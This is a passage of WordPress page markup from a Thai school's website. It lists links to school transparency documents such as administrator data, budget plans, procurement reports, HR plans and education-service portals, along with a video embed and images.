data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=sharing\">  - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 